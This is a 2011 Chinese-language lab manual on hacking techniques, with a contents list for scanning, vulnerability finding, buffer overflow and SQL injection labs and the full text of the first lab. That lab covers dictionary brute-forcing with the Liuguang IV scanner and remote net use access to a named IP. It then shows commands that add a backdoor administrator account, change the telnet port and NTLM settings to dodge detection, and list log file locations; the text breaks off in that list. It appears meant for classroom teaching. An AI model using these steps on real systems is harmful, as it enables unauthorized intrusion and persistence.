黑客技术实验指导书

黑客技术实验指导书彭晓红2011年5月目录[实验一]扫描工具的使用................................................................................................................3一、实验目的...........................................................................................................................3二、实验要求...........................................................................................................................3三、实验内容和步骤...............................................................................................................3[实验二]漏洞分析与查找..............................................................................................................26一、实验目的.........................................................................................................................26二、实验要求.........................................................................................................................26三、实验内容和步骤.............................................................................................................26[实验三]缓存溢出攻击................................................................................................................28一、实验目的.........................................................................................................................28二、实验要求.........................................................................................................................28三、实验内容和步骤.............................................................................................................28[实验四]SQLinjection攻击..........................................................................................................41一、实验目的.........................................................................................................................41二、实验要求.........................................................................................................................41三、实验内容和步骤.............................................................................................................41[实验一]扫描工具的使用一、实验目的（1）通过使用流光IV软件获取目标主机的帐号和密码，并登陆。（2）通过实验了解和掌握扫描工具的使用。二、实验要求1了解和掌握扫描工具的使用。2在命令提示符下使用net相关命令。三、实验内容和步骤任务一扫描工具的使用1点击探测－高级扫描工具！2输入ip地址范围起始地址/结束地址：需要扫描的IP地址范围。目标系统：ALL-所有系统/NT-NT／2000系统/UNIX-UNIX系统，根据选择的不同下面的［检测项目］将会有不同设置。获取主机名：获取主机的名称。检测项目：选择需要扫描的项目，根据选择的不同表单会有所不同。3自己定义你的用户字典和密码字典。猜解用户名字典：设置扫描中采用的用户字典，适用于POP3/FTP/IMAP/SQL/MYSQL。猜解密码字典：设置扫描中采用的密码字典，适用于POP3/FTP/IMAP/SQL/MYSQL。保存扫描报告：扫描的报告，采用HTML格式。并发线程数目：默认80，可以根据情况增减，如果线程数目越大速度越快但是越容易误报和漏报。网络选项：设置TCP参数4实验结果任务二成功登陆到目标主机1在命令提示符下使用netuse命令远程连接主机210.192.111.207。如下所示：2输入以下命令探测目标主机信息ver对方主机显示：C:\WINNT\system32verMicrosoftWindows2000[Version5.00.2195]C:\WINNT\system32C:\WINNT\system32netstart已经启动以下Windows2000服务:AlerterApplicationManagementCOM+EventSystemComputerBrowserDHCPClientDistributedFileSystemDistributedLinkTrackingClientDistributedLinkTrackingServerDistributedTransactionCoordinatorDNSClientEventLogFileReplicationServiceFTPPublishingServiceIISAdminServiceIndexingServiceIntersiteMessagingIPSECPolicyAgentKerberosKeyDistributionCenterLogicalDiskManagerMessengerMicrosoftSearchMicrosoftSMTPServiceMSSQLServerNetLogonNetworkConnectionsNTLMSecuritySupportProviderPlugandPlayPrintSpoolerProtectedStorageRemoteProcedureCall(RPC)RemoteProcedureCall(RPC)LocatorRemoteRegistryServiceRemovableStorageRunAsServiceSecurityAccountsManagerServerSQLServerAgentSystemEventNotificationTaskSchedulerTCP/IPNetBIOSHelperServiceWindowsManagementInstrumentationDriverExtensionsWindowsTimeWorkstationWorldWideWebPublishingService许可协议登录服务命令成功完成。C:\WINNT\system32C:\WINNT\system32netstarttelnetTelnet服务正在启动.Telnet服务已经启动成功。3在目标主机上新增用户C:\WINNT\system32netuserkkkk/add命令成功完成。C:\WINNT\system32C:\WINNT\system32netlocalgroupadministratorskk/add命令成功完成。输入：telnet210.192.111.207显示：NTLMAuthenticationfailedduetoinsufficientcredentials.PleaseloginwithcleartextusernameandpasswordServerallowsNTLMauthenticationonlyServerhasclosedconnection遗失对主机的连接。4在小榕的流光IV目录下的tools目录下有一个ntlm.exe的文件5把telnet服务停止，然后重新启动.再试一试！6tlntadmntelnet服务器管理器。如果对方主机上有人运行了这个程序,你的ip地址和你所使用的用户名就被他看到了！选择3可以更改telnet断口，默认的是23。telnet210.192.111.207窗口显示：0)退出这个应用程序1)列出当前用户2)结束一个用户的会话...3)显示/更改注册表设置...4)开始服务5)停止服务请键入一个选项的号码[0-5]以选择该选项:3请在下列选项中选择一个:0)退出这个菜单1)AllowTrustedDomain2)AltKeyMapping3)DefaultDomain4)DefaultShell5]以选择该选项:5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:70)退出这个菜单Domain1)AllowTrustedDomain5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:8TelnetPort的当前值=23您确实想更改这个值吗?[y/n]yTelnetPort[当前值=23;]:99您确实想将TelnetPort设置为:99?[y/n]y只有当Telnet服务重新开始后设置才会生效请在下列选项中选择一个:0)退出这个菜单1)AllowTrustedDomain2)AltKeyMapping3)DefaultDomain5]以选择该选项:4)DefaultShell5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:7NTLM的当前值=1您确实想更改这个值吗?[y/n]ntlm的默认值是2刚才copy的ntlm并在他的主机运行已经改过了。7Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、日志等等，可能会根据服务器所开启的服务不同。应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小。安全日志文件：%systemroot%\system32\config\SecEvent.EVT系统日志文件：%syst